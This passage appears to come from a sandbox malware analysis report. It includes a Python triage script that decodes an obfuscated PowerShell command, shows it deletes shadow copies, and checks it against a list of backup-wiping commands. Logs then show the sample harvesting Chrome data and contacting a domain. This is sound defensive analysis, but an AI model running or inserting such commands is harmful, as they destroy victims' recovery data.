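# Command line as recorded in this report (signature "Bypasses PowerShell
# execution policy"); the hex blob is copied verbatim from it.
REPORT_CMDLINE = (
    "powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+"
    "'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'"
    ".Substring(2*$_,2))};iex $s'"
)

# The idiom: a range (0..N) drives [char][byte]('0x'+HEX.Substring(2*$_,2)),
# i.e. two hex digits per iteration appended to an accumulator.
_HEX_LOOP = re.compile(
    r"\(0\.\.(?P<last>\d+)\)"          # loop bound, inclusive
    r".*?\[char\]\[byte\]\('0x'\+"     # per-byte cast
    r"'(?P<hex>[0-9A-Fa-f]+)'"         # the hex blob
    r"\.Substring\(2\*\$_,\s*2\)",     # two hex digits per iteration
    re.DOTALL,
)

# Decoded-command patterns worth an alert. Only the first one comes from this
# report; the rest are assumed additions for other recovery-inhibition commands.
DANGEROUS_PATTERNS = {
    r"Win32_Shadowcopy.*\.Delete\(\)": "shadow copy deletion (inhibits recovery)",
    r"vssadmin\s+delete\s+shadows": "shadow copy deletion via vssadmin",
    r"wbadmin\s+delete\s+catalog": "backup catalog deletion",
    r"bcdedit.*recoveryenabled\s+no": "disables Windows recovery",
}


def decode_hex_loop(cmdline: str) -> Optional[str]:
    """Return the string the hex loop builds, or None if the idiom is absent.

    The loop runs last+1 iterations, so only the first last+1 bytes of the blob
    are decoded; trailing hex is ignored exactly as PowerShell would ignore it.
    """
    m = _HEX_LOOP.search(cmdline)
    if not m:
        return None
    n = int(m.group("last")) + 1
    raw = bytes.fromhex(m.group("hex"))[:n]
    return raw.decode("ascii", errors="replace")


def triage(cmdline: str) -> dict:
    """Flag policy bypass, iex-on-built-string, the hex loop and what it hides."""
    flags = []
    if re.search(r"-(?:ep|ExecutionPolicy)\s+bypass", cmdline, re.I):
        flags.append("execution policy bypass")
    if re.search(r"\biex\b|Invoke-Expression", cmdline, re.I):
        flags.append("Invoke-Expression on a built string")
    decoded = decode_hex_loop(cmdline)
    if decoded is not None:
        flags.append("hex-loop obfuscation")
        for pattern, reason in DANGEROUS_PATTERNS.items():
            if re.search(pattern, decoded, re.I):
                flags.append(reason)
    return {"decoded": decoded, "flags": flags}


if __name__ == "__main__":
    result = triage(REPORT_CMDLINE)
    print("decoded:", result["decoded"])
    for flag in result["flags"]:
        print(" -", flag)
```

Note that the loop bound matters: the blob here holds 63 bytes but (0..61) decodes only 62, so the trailing space is dropped; a decoder that converts the whole blob would still read correctly in this case but would be wrong for a sample that hides junk past the bound. The decoded command, `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, is the shadow copy wipe that makes the ransom note's "recovery" claims credible, which is why the execution-policy bypass and the suspended-mode process creation above belong to the same event.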

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE301C ImpersonateLoggedOnUser,GetUserNameW,GetComputerNameW,RtlAllocateHeap,_swprintf,RtlReAllocateHeap,RtlFreeHeap,RtlFreeHeap,RevertToSelf, 0_2_00CE301C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\58ea1f927c503c2b_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5febb783fe057117_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\181db4280bb3db70_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\244f905c10de3c26_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT Jump to behavior
Behavior Graph

Behavior Graph ID: 401962
Sample: rUUR0qQI22
Startdate: 01/05/2021
Architecture: WINDOWS
Score: 100

Sample-level signatures:
  Malicious sample detected (through community Yara rule)
  Antivirus / Scanner detection for submitted sample
  Multi AV Scanner detection for submitted file
  4 other signatures

Process tree:
  rUUR0qQI22.exe (graph counts: 2 created registry values, 16 created files)
    Network: securebestapp20.com, 185.105.109.19:443, EUROBYTEEurobyteLLCMoscowRussiaRU, Russian Federation
    Network: 192.168.2.1 (private, unknown)
    Dropped: C:\README.418990b0.TXT (ASCII)
    Signatures: Obfuscated command line found; Contains functionality to change the wallpaper; Bypasses PowerShell execution policy; 2 other signatures
    powershell.exe (graph count: 19)
      conhost.exe
    cmd.exe (graph count: 1)
      conhost.exe

Contacted Public IPs

IP              Domain               Country             ASN     ASN Name                            Malicious
185.105.109.19  securebestapp20.com  Russian Federation  210079  EUROBYTEEurobyteLLCMoscowRussiaRU   false

Private IPs

IP
192.168.2.1

Contacted Domains

Name                 IP              Active
securebestapp20.com  185.105.109.19  true